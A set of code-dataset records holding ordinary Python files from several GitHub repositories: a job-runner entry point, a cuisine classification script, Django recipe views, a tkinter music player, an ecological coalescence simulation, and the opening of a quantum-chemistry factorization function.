importlib.import_module(\n 'etutorservice.jobs.%s' % command_name)\n command_module.run(command_args)\n except ImportError as e:\n print('the command %s not found' % e.message)\n\n\ndef _init_logging_setting():\n logger = logging.getLogger()\n logger.setLevel(logging.DEBUG)\n ch = logging.StreamHandler(sys.stdout)\n ch.setLevel(logging.DEBUG)\n formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')\n ch.setFormatter(formatter)\n logger.addHandler(ch)\n return logger\n\n\ndef main():\n logger = _init_logging_setting()\n\n args = _parse_args()\n\n config.load_config_file(args.config_file)\n\n session_manager.register_db(config.data['mysql_db']['tutor'], 'default')\n # redis_manager.register_db(config.data['redis_db'], config.data['redis_server'])\n\n if args.run_service:\n logger.info('service start')\n elif args.command_name:\n logger.info('command start')\n _run_sub_command(args.command_name, args.command_args)\n else:\n print('args not valid')\n\n\nif __name__ == '__main__':\n main()\n", "repo_name": "wangbaliang/auto_app_test", "sub_path": "__main__.py", "file_name": "__main__.py", "file_ext": "py", "file_size_in_byte": 2126, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 5, "dataset": "github-code", "pt": "52", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 17, "usage_type": "call"}, {"api_name": "importlib.import_module", "line_number": 31, "usage_type": "call"}, {"api_name": "logging.getLogger", "line_number": 39, "usage_type": "call"}, {"api_name": "logging.DEBUG", "line_number": 40, "usage_type": "attribute"}, {"api_name": "logging.StreamHandler", "line_number": 41, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 41, "usage_type": "attribute"}, {"api_name": "logging.DEBUG", "line_number": 42, "usage_type": "attribute"}, {"api_name": "logging.Formatter", "line_number": 43, "usage_type": "call"}, {"api_name": "etutorservice.utils.config_helper.config.load_config_file", "line_number": 54, "usage_type": "call"}, {"api_name": 
"etutorservice.utils.config_helper.config", "line_number": 54, "usage_type": "name"}, {"api_name": "etutorservice.common.db.db_session_manager.register_db", "line_number": 56, "usage_type": "call"}, {"api_name": "etutorservice.common.db.db_session_manager", "line_number": 56, "usage_type": "name"}, {"api_name": "etutorservice.utils.config_helper.config.data", "line_number": 56, "usage_type": "attribute"}, {"api_name": "etutorservice.utils.config_helper.config", "line_number": 56, "usage_type": "name"}]} +{"seq_id": "73313397926", "text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Aug 2 21:17:17 2018\n\n@author: yinglirao\n\"\"\"\n\nimport json\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nfrom sklearn.preprocessing import LabelEncoder\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.model_selection import KFold\nimport numpy as np\nimport scipy\n\ndef load_data(data_path):\n print('Loading data...')\n with open(data_path, 'r') as f:\n data = json.load(f)\n return data\n\ndef extract_data(data, flag=None):\n ingredients = [line['ingredients'] for line in data]\n ingredients =[' '.join(i) for i in ingredients] #convert lists of words to sentences\n if flag == 'test':\n return np.asarray(ingredients)\n else:\n cuisine = [line['cuisine'] for line in data]\n le = LabelEncoder()\n labels = le.fit_transform(cuisine) #convert cuisine to categorical labels\n return np.asarray(ingredients), labels, le\n\ndef tfidf_transform(ingredients): \n tfidf = TfidfVectorizer(min_df=5, binary=True,\n ngram_range=(1, 2), stop_words='english')\n features = tfidf.fit_transform(ingredients)\n return features, tfidf\n\ndef create_dataset(error_sample_list, train_cuisine):\n new_x = np.empty((0, features.shape[1]))\n new_y = []\n for i in error_sample_list:\n new_x = scipy.sparse.vstack((new_x, x_train[train_cuisine==i]))\n new_y.extend(y_train[train_cuisine==i])\n return new_x, new_y\n\ndef create_new_testset(error_sample_list, pred_cuisine):\n x_new_test = np.empty((0, features.shape[1]))\n for i in error_sample_list:\n x_new_test = scipy.sparse.vstack((x_new_test, x_test[pred_cuisine==i]))\n return x_new_test\n\ndef update_ypreds(pred, error_sample_list,pred_cuisine,pred_origin):\n y_idx = 0\n for name in error_sample_list:\n check_idx = pred_cuisine==name\n for index, boolean in enumerate(check_idx):\n if boolean:\n pred_origin[index] = pred[y_idx]\n y_idx+=1\n return pred_origin\n\ndef model_correction(x_train, y_train, x_test, y_test):\n error_sample_lists = [['french', 'italian', 'southern_us'],\n ['british', 'irish', 'french','southern_us'],\n ['mexican','moroccan', 'spanish','greek'],\n ['thai','indian', 'vietnamese'],\n ['southern_us','italian'],\n ['greek', 'british', 'spanish', 'irish','french','russian'],\n ['japanese', 'chinese', 'filipino','korean','vietnamese']]\n models = [None]*len(error_sample_lists)\n preds = [None]*len(error_sample_lists)\n train_cuisine = le.inverse_transform(y_train)\n model_origin = LogisticRegression(random_state=0, penalty='l2', C=10)\n model_origin.fit(x_train, y_train)\n pred_origin = model_origin.predict(x_test)\n pred_cuisine = le.inverse_transform(pred_origin)\n \n for i in range(len(error_sample_lists)):\n models[i] = LogisticRegression(random_state=0, penalty='l2', C=10)\n new_x, new_y = create_dataset(error_sample_lists[i], train_cuisine)\n models[i].fit(new_x, new_y)\n test_new_x = create_new_testset(error_sample_lists[i], pred_cuisine)\n preds[i] = models[i].predict(test_new_x)\n 
pred_origin=update_ypreds(preds[i], error_sample_lists[i], pred_cuisine, pred_origin) \n score = (pred_origin == y_test).sum()/len(y_test) \n return pred_origin, score\n\ndata = load_data('../input/train.json')\ningredients, labels, le = extract_data(data)\nfeatures, tfidf = tfidf_transform(ingredients)\nkf = KFold(n_splits=4)\nscore = np.zeros((1,4)).ravel()\nfor i, (train_idx, test_idx) in enumerate(kf.split(features)):\n print('train...')\n x_train, y_train = features[train_idx], labels[train_idx]\n x_test, y_test = features[test_idx], labels[test_idx]\n _, score[i] = model_correction(x_train, y_train, x_test, y_test)\n# model=LogisticRegression(random_state=0, penalty='l2', C=10) #for logistic regression\n# model.fit(x_train, y_train) #for logistic regression\n# score[i]=model.score(x_test, y_test) #for logistic regression\n print(score[i]) \nprint('average cross validation sccore is: %.5f'%score.mean()) \n#0.78551 for model_correction\n#0.78506 for base model LG C=10, l2 penalty\n#0.78795 with logistic regression twice\n \n\n ", "repo_name": "dafeii17/kaggle-food-project", "sub_path": "models/regression+correction.py", "file_name": "regression+correction.py", "file_ext": "py", "file_size_in_byte": 4369, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "json.load", "line_number": 20, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 27, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.LabelEncoder", "line_number": 30, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 32, "usage_type": "call"}, {"api_name": "sklearn.feature_extraction.text.TfidfVectorizer", "line_number": 35, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 41, "usage_type": "call"}, {"api_name": "scipy.sparse.vstack", "line_number": 44, "usage_type": "call"}, {"api_name": "scipy.sparse", "line_number": 44, "usage_type": "attribute"}, {"api_name": "numpy.empty", "line_number": 49, "usage_type": "call"}, {"api_name": "scipy.sparse.vstack", "line_number": 51, "usage_type": "call"}, {"api_name": "scipy.sparse", "line_number": 51, "usage_type": "attribute"}, {"api_name": "sklearn.linear_model.LogisticRegression", "line_number": 75, "usage_type": "call"}, {"api_name": "sklearn.linear_model.LogisticRegression", "line_number": 81, "usage_type": "call"}, {"api_name": "sklearn.model_selection.KFold", "line_number": 93, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 94, "usage_type": "call"}]} +{"seq_id": "10666510342", "text": "from django.shortcuts import render, get_object_or_404,redirect\nfrom .models import Recipes, UserRecipe\nfrom accounts.models import UserProfile\nfrom category.models import Category\nfrom django.contrib.auth.models import User\nfrom django.core.paginator import EmptyPage, PageNotAnInteger, Paginator\nfrom django.db.models import Q\n\n# Create your views here.\ndef all_recipes(request, category_slug=None):\n categories = None\n recipes = None\n\n if category_slug != None:\n categories = get_object_or_404(Category, slug=category_slug)\n recipes = Recipes.objects.filter(category=categories)\n else:\n recipes = Recipes.objects.all()\n \n paginator = Paginator(recipes,15)\n page = request.GET.get('page')\n paged_recipes = paginator.get_page(page)\n context={\n 'recipes' : paged_recipes\n }\n return render(request, 'recipe/all_recipes.html', context)\n\n\ndef recipe_detail(request,id):\n recipe = Recipes.objects.get(id=id)\n\n similar_recipes 
=[]\n\n x = range(int(id)+1, int(id)+5)\n for n in x: \n similar_recipes.append(Recipes.objects.get(id=str(n)))\n\n ingredients_list = recipe.ingredients.split(',')\n nutritions_list = recipe.nutrition.split(',')\n context = {\n 'recipe': recipe,\n 'ingredients': ingredients_list,\n 'nutritions': nutritions_list,\n 'similar': similar_recipes,\n }\n return render(request, 'recipe/recipe_detail.html', context)\n\ndef upload_recipe(request):\n userprofile = get_object_or_404(UserProfile, user=request.user)\n\n if request.method == 'POST':\n recipe_name = request.POST['recipe_name']\n prep_time = request.POST['prep_time']\n cook_time = request.POST['cook_time']\n total_time = request.POST['total_time']\n servings = request.POST['servings']\n yields = request.POST['yields']\n ingredients = request.POST['ingredients']\n directions = request.POST['directions']\n cuisine_path = request.POST['cuisine_path']\n nutrition = request.POST['nutrition']\n img_src = request.FILES['img_src']\n category_id = request.POST['category_id']\n\n \n\n new_recipe = UserRecipe.objects.create(\n user_id = userprofile.user_id,\n recipe_name = recipe_name,\n prep_time = prep_time,\n cook_time = cook_time,\n total_time= total_time,\n servings= servings,\n yields = yields,\n ingredients = ingredients,\n directions = directions,\n cuisine_path = cuisine_path,\n nutrition= nutrition,\n img_src = img_src,\n category_id = category_id,\n )\n new_recipe.save()\n\n return redirect('profile')\n else:\n return render(request, 'recipe/upload_recipe.html')\n \n\ndef user_recipes(request, category_slug=None):\n categories = None\n recipes = None\n\n if category_slug != None:\n categories = get_object_or_404(Category, slug=category_slug)\n recipes = UserRecipe.objects.filter(category=categories)\n else:\n recipes = UserRecipe.objects.all()\n \n context={\n 'recipes' : recipes\n }\n\n return render(request, 'recipe/user_recipes.html', context)\n\ndef user_recipe_detail(request,id):\n recipe = UserRecipe.objects.get(id=id)\n userprofile = get_object_or_404(UserProfile, user_id=recipe.user_id)\n\n other_recips = UserRecipe.objects.filter(user_id=recipe.user_id)\n # for recipes in other_recips:\n # if recipes.id == id:\n # other_recips.remove()\n\n ingredients_list = recipe.ingredients.split(',')\n nutritions_list = recipe.nutrition.split(',')\n context = {\n 'recipe': recipe,\n 'ingredients': ingredients_list,\n 'nutritions': nutritions_list,\n 'userprofile': userprofile,\n 'other_recipes_by_user': other_recips,\n }\n return render(request, 'recipe/user_recipe_detail.html', context)\n\ndef search(request):\n if 'keyword' in request.GET:\n keyword = request.GET['keyword']\n if keyword:\n recipes = Recipes.objects.order_by('-rating').filter(Q(recipe_name__icontains=keyword) | Q(ingredients__icontains=keyword))\n recipes_count = recipes.count()\n\n paginator = Paginator(recipes,15)\n page = request.GET.get('page')\n paged_recipes = paginator.get_page(page)\n context={\n 'recipes': paged_recipes,\n 'recipes_count': recipes_count,\n 'keyword': keyword,\n }\n return render(request, 'recipe/all_recipes.html', context)", "repo_name": "prajval2000/recipeshare", "sub_path": "recipes/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 4662, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "django.shortcuts.get_object_or_404", "line_number": 15, "usage_type": "call"}, {"api_name": "category.models.Category", "line_number": 15, "usage_type": 
"argument"}, {"api_name": "models.Recipes.objects.filter", "line_number": 16, "usage_type": "call"}, {"api_name": "models.Recipes.objects", "line_number": 16, "usage_type": "attribute"}, {"api_name": "models.Recipes", "line_number": 16, "usage_type": "name"}, {"api_name": "models.Recipes.objects.all", "line_number": 18, "usage_type": "call"}, {"api_name": "models.Recipes.objects", "line_number": 18, "usage_type": "attribute"}, {"api_name": "models.Recipes", "line_number": 18, "usage_type": "name"}, {"api_name": "django.core.paginator.Paginator", "line_number": 20, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 26, "usage_type": "call"}, {"api_name": "models.Recipes.objects.get", "line_number": 30, "usage_type": "call"}, {"api_name": "models.Recipes.objects", "line_number": 30, "usage_type": "attribute"}, {"api_name": "models.Recipes", "line_number": 30, "usage_type": "name"}, {"api_name": "models.Recipes.objects.get", "line_number": 36, "usage_type": "call"}, {"api_name": "models.Recipes.objects", "line_number": 36, "usage_type": "attribute"}, {"api_name": "models.Recipes", "line_number": 36, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 46, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 49, "usage_type": "call"}, {"api_name": "accounts.models.UserProfile", "line_number": 49, "usage_type": "argument"}, {"api_name": "models.UserRecipe.objects.create", "line_number": 67, "usage_type": "call"}, {"api_name": "models.UserRecipe.objects", "line_number": 67, "usage_type": "attribute"}, {"api_name": "models.UserRecipe", "line_number": 67, "usage_type": "name"}, {"api_name": "django.shortcuts.redirect", "line_number": 84, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 86, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 94, "usage_type": "call"}, {"api_name": "category.models.Category", "line_number": 94, "usage_type": "argument"}, {"api_name": "models.UserRecipe.objects.filter", "line_number": 95, "usage_type": "call"}, {"api_name": "models.UserRecipe.objects", "line_number": 95, "usage_type": "attribute"}, {"api_name": "models.UserRecipe", "line_number": 95, "usage_type": "name"}, {"api_name": "models.UserRecipe.objects.all", "line_number": 97, "usage_type": "call"}, {"api_name": "models.UserRecipe.objects", "line_number": 97, "usage_type": "attribute"}, {"api_name": "models.UserRecipe", "line_number": 97, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 103, "usage_type": "call"}, {"api_name": "models.UserRecipe.objects.get", "line_number": 106, "usage_type": "call"}, {"api_name": "models.UserRecipe.objects", "line_number": 106, "usage_type": "attribute"}, {"api_name": "models.UserRecipe", "line_number": 106, "usage_type": "name"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 107, "usage_type": "call"}, {"api_name": "accounts.models.UserProfile", "line_number": 107, "usage_type": "argument"}, {"api_name": "models.UserRecipe.objects.filter", "line_number": 109, "usage_type": "call"}, {"api_name": "models.UserRecipe.objects", "line_number": 109, "usage_type": "attribute"}, {"api_name": "models.UserRecipe", "line_number": 109, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 123, "usage_type": "call"}, {"api_name": "models.Recipes.objects.order_by", "line_number": 129, "usage_type": "call"}, {"api_name": "models.Recipes.objects", "line_number": 
129, "usage_type": "attribute"}, {"api_name": "models.Recipes", "line_number": 129, "usage_type": "name"}, {"api_name": "django.db.models.Q", "line_number": 129, "usage_type": "call"}, {"api_name": "django.core.paginator.Paginator", "line_number": 132, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 140, "usage_type": "call"}]} +{"seq_id": "2550503270", "text": "from tkinter import *\nfrom tkinter import filedialog as fd\nfrom tkinter import ttk\nfrom tkinter import messagebox\nfrom pygame import mixer\nimport webbrowser\nimport os\nfrom os import system, name\n\n\ndef dir():\n \n # for windows\n if name == 'nt':\n _ = os.chdir('C:/Sigma/bin')\n \n # for mac and linux(here, os.name is 'posix')\n else:\n username = os.getlogin()\n _ = os.chdir(f'/home/{username}/Sigma/bin')\n\ndir()\n\nmixer.init()\nroot = Tk()\n\nwidth,height = 400,190\nroot.geometry(f\"{width}x{height}\")\nroot.resizable(False, False)\n# root.iconbitmap('icon.bmp')\nroot.title(\"Sigma Music Player\")\nmixer.music.load(\"Sigmaintro.mp3\")\nmixer.music.play()\n\nbottom_plate = Label(text=\"Anas-Dew\", bg=\"Black\",\n fg=\"White\", font=\"sans 9 italic\")\nbottom_plate.pack(side=BOTTOM, fill=X)\n\n# ---NECESARY FUNCTIONS------------------------------------\ndef select_file():\n filetypes = (\n ('Music files', '*.mp3'),\n ('All files', '*.*')\n )\n \n mfile = fd.askopenfilename(\n title='Open music',\n initialdir='/',\n filetypes=filetypes\n )\n print(\"File Path : \" + mfile)\n mixer.music.load(mfile)\n mixer.music.play()\n title_bar.config(text=\"Playing...\")\n'''\nDis-countinued------\ndef select_folder():\n mfolder = fd.askdirectory()\n print(\"Selected Folder -> \" + mfolder)\n with open(\"cookie.ch\",\"w\") as c:\n c.write(str(mfolder))\n c.close()\nwith open(\"cookie.ch\",\"r\") as c:\n path = c.readline()\n os.chdir(path)\n c.close() \n''' \ndef Pause():\n mixer.music.pause()\n title_bar.config(text=\"Paused.\")\n\ndef Resume():\n mixer.music.unpause()\n title_bar.config(text=\"Playing...\")\n\ndef meow():\n user_choice = messagebox.askyesno(\"Feedback\",\"Did you like this app ?\")\n print(user_choice)\n if user_choice == True:\n rate_choice = messagebox.askyesno(\"Support\",\"Rate my project on Github.\")\n if rate_choice == True:\n messagebox.showinfo(\"Redirect\",\"You are being redirected to Github.\")\n webbrowser.open_new(\n r\"https://github.com/Anas-Dew/Sigma-Music-Player\")\n \n#-----------------------MENU BAR---------------------------\n\ndef menu_bar():\n menubar = Menu(root)\n\n def loop():\n messagebox.showwarning(\"Alert\",\"This feature is in development.\")\n\n #-----------Adding File Menu and commands-------------------\n file = Menu(menubar, tearoff=0)\n menubar.add_cascade(label='File', menu=file)\n file.add_command(label='Open...', command=lambda: select_file())\n file.add_separator()\n file.add_command(label='Replay', command=lambda: mixer.music.play())\n file.add_checkbutton(label='Loop',command=loop)\n file.add_separator()\n file.add_command(label='Exit', command=root.destroy)\n\n # ----------Adding more Menu and commands------------\n more = Menu(menubar, tearoff=0)\n menubar.add_cascade(label='More', menu=more)\n more.add_command(label='Source Code',command=lambda: webbrowser.open_new(\n r\"https://github.com/Anas-Dew/Sigma-Music-Player\"))\n \n more.add_command(label='Meow !!', command=meow)\n more.add_separator()\n more.add_command(label='Thanks !', command=lambda: messagebox.showinfo(\"Developer's Note\",\"Thank you for using. 
❤ \\nHope you liked it.\"))\n root.config(menu=menubar)\n\nmenu_bar()\n# ---------------LIST-BOX---------------------------------------------------\n# music_list = Listbox(root,height=7,width=65).pack()\n# -------------SCREEN-BUTTON------------------------------------------------\n\nopen_button = ttk.Button(root,text='Open Music',command=select_file)\nopen_button.pack(expand=False,pady=40)\n\n# ------------------NAVIGATION FRAME--------------------------------------\nplay_navi = Frame(root, bg=\"dark grey\", width=10,borderwidth=3,relief=SUNKEN)\n\ntitle_bar = Label(play_navi, text=\"Choose Music\",\n bg=\"dark grey\", fg=\"black\", font=\"Purisa 15 italic\")\ntitle_bar.pack(side=LEFT, padx=10)\npause_button = Button(play_navi, text=\"Pause\",\n bg=\"Black\", fg=\"White\", font=\"sans 9 italic\", padx=15, command=Pause)\npause_button.pack(side=RIGHT, padx=5)\nresume_button = Button(play_navi, text=\"Resume\",\n bg=\"Black\", fg=\"White\", font=\"sans 9 italic\", padx=10, command=Resume)\nresume_button.pack(side=RIGHT, padx=20)\n\nplay_navi.pack(side=BOTTOM, fill=X)\n#------------------------------------------------------\nroot.mainloop()", "repo_name": "Anas-Dew/Sigma-Music-Player", "sub_path": "Sigma/player.py", "file_name": "player.py", "file_ext": "py", "file_size_in_byte": 4453, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "os.name", "line_number": 14, "usage_type": "name"}, {"api_name": "os.chdir", "line_number": 15, "usage_type": "call"}, {"api_name": "os.getlogin", "line_number": 19, "usage_type": "call"}, {"api_name": "os.chdir", "line_number": 20, "usage_type": "call"}, {"api_name": "pygame.mixer.init", "line_number": 24, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 24, "usage_type": "name"}, {"api_name": "pygame.mixer.music.load", "line_number": 32, "usage_type": "call"}, {"api_name": "pygame.mixer.music", "line_number": 32, "usage_type": "attribute"}, {"api_name": "pygame.mixer", "line_number": 32, "usage_type": "name"}, {"api_name": "pygame.mixer.music.play", "line_number": 33, "usage_type": "call"}, {"api_name": "pygame.mixer.music", "line_number": 33, "usage_type": "attribute"}, {"api_name": "pygame.mixer", "line_number": 33, "usage_type": "name"}, {"api_name": "tkinter.filedialog.askopenfilename", "line_number": 46, "usage_type": "call"}, {"api_name": "tkinter.filedialog", "line_number": 46, "usage_type": "name"}, {"api_name": "pygame.mixer.music.load", "line_number": 52, "usage_type": "call"}, {"api_name": "pygame.mixer.music", "line_number": 52, "usage_type": "attribute"}, {"api_name": "pygame.mixer", "line_number": 52, "usage_type": "name"}, {"api_name": "pygame.mixer.music.play", "line_number": 53, "usage_type": "call"}, {"api_name": "pygame.mixer.music", "line_number": 53, "usage_type": "attribute"}, {"api_name": "pygame.mixer", "line_number": 53, "usage_type": "name"}, {"api_name": "pygame.mixer.music.pause", "line_number": 69, "usage_type": "call"}, {"api_name": "pygame.mixer.music", "line_number": 69, "usage_type": "attribute"}, {"api_name": "pygame.mixer", "line_number": 69, "usage_type": "name"}, {"api_name": "pygame.mixer.music.unpause", "line_number": 73, "usage_type": "call"}, {"api_name": "pygame.mixer.music", "line_number": 73, "usage_type": "attribute"}, {"api_name": "pygame.mixer", "line_number": 73, "usage_type": "name"}, {"api_name": "tkinter.messagebox.askyesno", "line_number": 77, "usage_type": "call"}, {"api_name": "tkinter.messagebox", 
"line_number": 77, "usage_type": "name"}, {"api_name": "tkinter.messagebox.askyesno", "line_number": 80, "usage_type": "call"}, {"api_name": "tkinter.messagebox", "line_number": 80, "usage_type": "name"}, {"api_name": "tkinter.messagebox.showinfo", "line_number": 82, "usage_type": "call"}, {"api_name": "tkinter.messagebox", "line_number": 82, "usage_type": "name"}, {"api_name": "webbrowser.open_new", "line_number": 83, "usage_type": "call"}, {"api_name": "tkinter.messagebox.showwarning", "line_number": 92, "usage_type": "call"}, {"api_name": "tkinter.messagebox", "line_number": 92, "usage_type": "name"}, {"api_name": "pygame.mixer.music.play", "line_number": 99, "usage_type": "call"}, {"api_name": "pygame.mixer.music", "line_number": 99, "usage_type": "attribute"}, {"api_name": "pygame.mixer", "line_number": 99, "usage_type": "name"}, {"api_name": "webbrowser.open_new", "line_number": 107, "usage_type": "call"}, {"api_name": "tkinter.messagebox.showinfo", "line_number": 112, "usage_type": "call"}, {"api_name": "tkinter.messagebox", "line_number": 112, "usage_type": "name"}, {"api_name": "tkinter.ttk.Button", "line_number": 120, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 120, "usage_type": "name"}]} +{"seq_id": "22373398406", "text": "#!/usr/bin/env python3\n\n__appname__ = '[s_plot.py]'\n__author__ = 'Pablo Lechon (plechon@ucm.es)'\n__version__ = '0.0.1'\n\n## IMPORTS ##\n\nimport sys\nimport pandas as pd\nimport numpy as np\nfrom scipy.integrate import solve_ivp, odeint\nfrom coalescence import uniform_pack\nfrom functions import * \nimport matplotlib.pylab as plt\nfrom itertools import combinations, product\nfrom progressbar import ProgressBar\nfrom scipy.special import comb\n\n## CONSTANTS ##\n\nglobal R; R = 8.314462618 # J/(K mol)\nglobal DeltaGATP; deltaGATP = 75e3 # J/mol\nglobal T; T = 298 # k \nglobal E; E = 3e6 # j (Total energy contained in metabolites)\n\n## FUNCTIONS ##\n\n\ndef main(argv):\n '''Main function'''\n\n #Load communities data \n composition = pd.read_csv('../data/coal_composition.csv', index_col = 0)\n networks = pd.read_csv('../data/coal_network.csv', index_col = 0)\n time_series = pd.read_csv('../data/coal_time_series.csv', index_col = 0)\n all_data = pd.read_csv('../data/community_data.csv')\n\n #Transform from string to numeric vector all elements in substrate and \n #product colums\n all_data['substrate'] = all_data['substrate'].apply(lambda x: \n np.fromstring(x[1:-1], sep=' ', dtype = int))\n all_data['product'] = all_data['product'].apply(lambda x: \n np.fromstring(x[1:-1], sep=' ', dtype = int))\n keys = list(composition.keys())\n #Metabolite list\n met_list = [i for i in keys if i.startswith('m')]\n #Number of metabolites\n m = len(met_list)\n s = len([i for i in keys if i.startswith('s')])\n #Vector of richnesses\n richness = np.unique(all_data.richness)\n #Preallocate storing objects\n column_names = [\"similarity\", \"cohesion\"]\n similarity_fitness = pd.DataFrame(columns = column_names)\n tn = np.array([])\n Nn = np.array([])\n richnessn = np.array([], dtype = int)\n n_simulationn = np.array([], dtype = int)\n strainsn = np.array([], dtype = int)\n c_numbern = np.array([], dtype = int)\n\n #Get communities with richness 5\n r = 5\n comp_long = all_data[all_data.richness == r]\n #Perform coalescence events between all posible pairs of communities \n #How many communities do we have?\n com_simul = np.unique(comp_long.n_simulation)\n num_com = len(com_simul)\n #Get all pairs of competing communities \n all_pairs = 
list(combinations(com_simul, 2))\n #How many pairs?\n it = len(all_pairs)\n #Initialize storing objects\n similarity = np.zeros(it)\n DF = np.zeros(it)\n DP2 = np.zeros(it)\n pbar = ProgressBar()\n print('Coalescence of communities of richness:', r)\n for i in pbar(range(it)):\n #Pick communities numbers c1 and c2\n c1 = all_pairs[i][0]\n c2 = all_pairs[i][1]\n #Extract community information\n comp_c1 = comp_long[comp_long.n_simulation == c1].reset_index(drop = True)\n comp_c2 = comp_long[comp_long.n_simulation == c2].reset_index(drop = True)\n #Get number of strains in each community\n num_c1 = len(comp_c1)\n num_c2 = len(comp_c2)\n s = num_c1 + num_c2\n #Obtain reaction networks of c1 as a list of tuples\n net_C1 = vector2tuple(comp_c1['substrate'],\n comp_c1['product'])\n net_C2 = vector2tuple(comp_c2['substrate'],\n comp_c2['product'])\n #Facilitation matrix of initial communities\n f_mat = facilitation_matrix(net_C1, m)\n f_mat2 = facilitation_matrix(net_C2, m)\n #Competition matrix \n c_mat = competition_matrix(net_C1, m)\n c_mat2 = competition_matrix(net_C2, m)\n #Cohesion of each ccommunity\n P2_c1 = np.mean(np.sum(f_mat-c_mat, axis = 1))\n P2_c2 = np.mean(np.sum(f_mat2-c_mat2, axis = 1))\n #Calculate difference in cohesion\n DP2[i] = P2_c1 - P2_c2\n #Perform coalescence event between c1 and c2\n t, z, nets = coalescence_event(C1 = comp_c1, \n C2 = comp_c2, \n m = m, \n s = s)\n\n #Get aboundance time series\n N = z[0:s]\n #Get abundance vector of species after coalescence at stable state\n abundance_f = N[:, -1] \n #Create dataframe of coalescence outcome\n outcome = pd.concat([comp_c1, comp_c2])\n outcome['stable.state'] = abundance_f\n #Eliminate extinctions\n outcome = outcome[outcome['stable.state'] > 1].reset_index(drop = True)\n #Obtain reaction networks of outcome as a list of tuples\n #net_outcome = vector2tuple(outcome['substrate'],\n # outcome['product'])\n #Number of species present in community c1 originally\n abundance_0 = np.array(comp_c1['stable.state'])\n #Add as many 0 as species in community c2 to calculate similarity\n abundance_0 = np.concatenate([abundance_0, np.zeros(num_c2)])\n #Calculate similarity \n similarity[i] = np.dot(abundance_0, abundance_f)/\\\n (np.sqrt(sum(abundance_0**2))*\\\n np.sqrt(sum(abundance_f**2)))\n\n similarity_fitness = pd.DataFrame({'similarity':similarity,\n 'delP2':DP2})\n\n\n similarity_fitness.to_csv('../data/similarity_fitness.csv')\n return 0\n\n## CODE ##\n\nif (__name__ == '__main__'):\n status = main(sys.argv)\n sys.exit(status)\n \n \n", "repo_name": "pablolich/master_thesis", "sub_path": "code/s_plot.py", "file_name": "s_plot.py", "file_ext": "py", "file_size_in_byte": 5438, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "pandas.read_csv", "line_number": 34, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 35, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 36, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 37, "usage_type": "call"}, {"api_name": "numpy.fromstring", "line_number": 42, "usage_type": "call"}, {"api_name": "numpy.fromstring", "line_number": 44, "usage_type": "call"}, {"api_name": "numpy.unique", "line_number": 52, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 55, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 56, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 57, "usage_type": "call"}, {"api_name": 
"numpy.array", "line_number": 58, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 59, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 60, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 61, "usage_type": "call"}, {"api_name": "numpy.unique", "line_number": 68, "usage_type": "call"}, {"api_name": "itertools.combinations", "line_number": 71, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 75, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 76, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 77, "usage_type": "call"}, {"api_name": "progressbar.ProgressBar", "line_number": 78, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 103, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 103, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 104, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 104, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 118, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 126, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 128, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 128, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 130, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 131, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 132, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 134, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 144, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 145, "usage_type": "call"}]} +{"seq_id": "31504304822", "text": "import pennylane as qml\nfrom pennylane import numpy as np\n\n\ndef factorize(two_electron, tol_factor=1.0e-5, tol_eigval=1.0e-5):\n r\"\"\"Return the double-factorized form of a two-electron integral tensor in spatial basis.\n\n The two-electron tensor 